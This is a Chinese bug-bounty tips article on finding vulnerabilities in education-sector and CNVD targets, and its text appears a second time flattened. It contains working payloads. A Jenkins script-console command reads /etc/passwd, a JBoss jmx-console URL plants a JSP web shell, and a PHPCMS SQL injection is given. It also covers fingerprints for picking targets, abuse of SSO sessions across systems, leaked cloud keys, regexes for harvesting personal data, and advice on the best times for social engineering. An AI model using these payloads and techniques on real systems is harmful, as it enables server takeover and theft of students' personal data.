EDUSRC、CNVD挖洞技巧分享(三)
字数 1499 2025-09-04 23:22:12

EDUSRC/CNVD漏洞挖掘技巧详解

一、未授权访问漏洞挖掘

1. Jenkins未授权命令执行

  • 漏洞路径:/script
  • 利用方式: 
    println 'cat /etc/passwd'.execute().text
println "whoami".execute().text

2. JBoss未授权漏洞

  • 漏洞路径:/jmx-console/
  • 利用方式: 
    http://XXXX.com:8083/jmx-console//HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=August.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25+if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b+%25%3e&argType=boolean&arg4=True

3. 302跳转未授权

  • 检测方法:
    1. 访问目标URL时观察到短暂进入后台后跳转登录页
    2. 使用Burp抓包,Drop掉302跳转包
    3. 检查是否仍可访问后台功能

二、安全威胁情报挖掘

1. 备案信息异常

  • 类型一:工信部备案存在但网站已被其他内容接管
  • 类型二:官方公众号发布已失效URL(备案已注销)

三、SQL注入漏洞挖掘

1. 通用SQL注入点

  • 典型URL格式:/xxxxx.php?c=xxxx&a=xxxx&xxxxid=
  • 挖掘方法:
    1. 发现一处SQL注入
    2. 收集该公司开发的所有框架资产
    3. 在所有域名上拼接已知存在SQL注入的URL路径

2. PHPCMS v9魔改版注入

  • 原始URL:http://www.xxxxx.cn/index.php?m=content&c=index&a=lists&catid=193
  • 注入方法:添加&id=888%27参数
  • 原理:官方版本lists方法不接受id参数,魔改版本错误拼接导致注入

四、目录遍历与信息泄露

1. 敏感文件类型

  • .key:密钥文件
  • .xls:人员名单等数据
  • .docx:合同或打印模板
  • .sql:数据库导出文件
  • .ibd:InnoDB表空间文件(二进制格式)
  • .MYD:MyISAM表数据文件

2. 信息检索技巧

  • 使用正则表达式搜索敏感信息:
    • 身份证号:\d{17}[\dXx]
    • 手机号:1[3-9]\d{9}

3. APK文件分析

  • 工具链:
    • apkleaks:解包/反编译并扫描敏感信息
    • jadx:将DEX字节码转换为Java源代码
    • GDA4.11:APK分析工具
  • 分析重点:
    • 密钥泄露
    • 未授权接口
    • 弱加密/签名算法
    • 敏感文件/目录访问
    • 逻辑漏洞

五、红队社工技巧

1. 高价值系统判断标准

  • 重要业务系统
  • 信息量大的系统(如学生档案、财务数据等)

2. 教育系统重点关注时段

  • 学生实习、毕业季
  • 招生迎新季
  • 请假、奖学金申请时段

六、弱口令漏洞挖掘

1. 常见框架指纹

  • 绿若依:web.icon=="4eeb8a8eb30b70af511dcc28c11a3216"
  • 黑若依:web.icon=="eeed0dd225e44a5fe7b5f31fea185b61"
  • 蓝若依:web.icon=="e49fd30ea870c7a820464ca56a113e6e"

2. 若依框架未授权访问

  • 路径拼接尝试:
    • /monitor/job(定时任务)
  • 大屏数据泄露:
    • 学号可能包含身份证信息(去除前缀后)

3. 内网系统端口映射漏洞

  • 识别特征:微步标记为VPN/代理
  • 漏洞原理:
    1. 内网系统通过端口映射暴露到公网
    2. 多个系统共享同一认证域名/SSO
    3. Session/Cookie可跨系统滥用
  • 利用方法:
    1. 登录一个系统
    2. 不退出情况下访问同IP其他系统
    3. 检查是否自动登录

4. 云存储配置泄露

  • 常见泄露点:
    • 文件管理配置中包含桶URL和Key
    • MinIO未授权访问(返回<ListBucketResult>XML)
  • 验证方法:直接拼接URL访问
  • 云服务Key利用:
    • 阿里云Key可接管实例
    • 通过行云管家等工具管理实例

七、安全测试注意事项

  1. 使用虚拟机武器库+无痕窗口+Tor
  2. 测试前创建快照,测试后回滚
  3. 避免输入真实账号密码和个人敏感信息
  4. 仅用于合法授权环境下的安全研究
  5. 所有测试行为应遵循法律法规
EDUSRC/CNVD漏洞挖掘技巧详解 一、未授权访问漏洞挖掘 1. Jenkins未授权命令执行 漏洞路径: /script 利用方式: 2. JBoss未授权漏洞 漏洞路径: /jmx-console/ 利用方式: 3. 302跳转未授权 检测方法: 访问目标URL时观察到短暂进入后台后跳转登录页 使用Burp抓包,Drop掉302跳转包 检查是否仍可访问后台功能 二、安全威胁情报挖掘 1. 备案信息异常 类型一:工信部备案存在但网站已被其他内容接管 类型二:官方公众号发布已失效URL(备案已注销) 三、SQL注入漏洞挖掘 1. 通用SQL注入点 典型URL格式: /xxxxx.php?c=xxxx&a=xxxx&xxxxid= 挖掘方法: 发现一处SQL注入 收集该公司开发的所有框架资产 在所有域名上拼接已知存在SQL注入的URL路径 2. PHPCMS v9魔改版注入 原始URL: http://www.xxxxx.cn/index.php?m=content&c=index&a=lists&catid=193 注入方法:添加 &id=888%27 参数 原理:官方版本lists方法不接受id参数,魔改版本错误拼接导致注入 四、目录遍历与信息泄露 1. 敏感文件类型 .key :密钥文件 .xls :人员名单等数据 .docx :合同或打印模板 .sql :数据库导出文件 .ibd :InnoDB表空间文件(二进制格式) .MYD :MyISAM表数据文件 2. 信息检索技巧 使用正则表达式搜索敏感信息: 身份证号: \d{17}[\dXx] 手机号: 1[3-9]\d{9} 3. APK文件分析 工具链: apkleaks :解包/反编译并扫描敏感信息 jadx :将DEX字节码转换为Java源代码 GDA4.11 :APK分析工具 分析重点: 密钥泄露 未授权接口 弱加密/签名算法 敏感文件/目录访问 逻辑漏洞 五、红队社工技巧 1. 高价值系统判断标准 重要业务系统 信息量大的系统(如学生档案、财务数据等) 2. 教育系统重点关注时段 学生实习、毕业季 招生迎新季 请假、奖学金申请时段 六、弱口令漏洞挖掘 1. 常见框架指纹 绿若依: web.icon=="4eeb8a8eb30b70af511dcc28c11a3216" 黑若依: web.icon=="eeed0dd225e44a5fe7b5f31fea185b61" 蓝若依: web.icon=="e49fd30ea870c7a820464ca56a113e6e" 2. 若依框架未授权访问 路径拼接尝试: /monitor/job (定时任务) 大屏数据泄露: 学号可能包含身份证信息(去除前缀后) 3. 内网系统端口映射漏洞 识别特征:微步标记为VPN/代理 漏洞原理: 内网系统通过端口映射暴露到公网 多个系统共享同一认证域名/SSO Session/Cookie可跨系统滥用 利用方法: 登录一个系统 不退出情况下访问同IP其他系统 检查是否自动登录 4. 云存储配置泄露 常见泄露点: 文件管理配置中包含桶URL和Key MinIO未授权访问(返回 <ListBucketResult> XML) 验证方法:直接拼接URL访问 云服务Key利用: 阿里云Key可接管实例 通过行云管家等工具管理实例 七、安全测试注意事项 使用虚拟机武器库+无痕窗口+Tor 测试前创建快照,测试后回滚 避免输入真实账号密码和个人敏感信息 仅用于合法授权环境下的安全研究 所有测试行为应遵循法律法规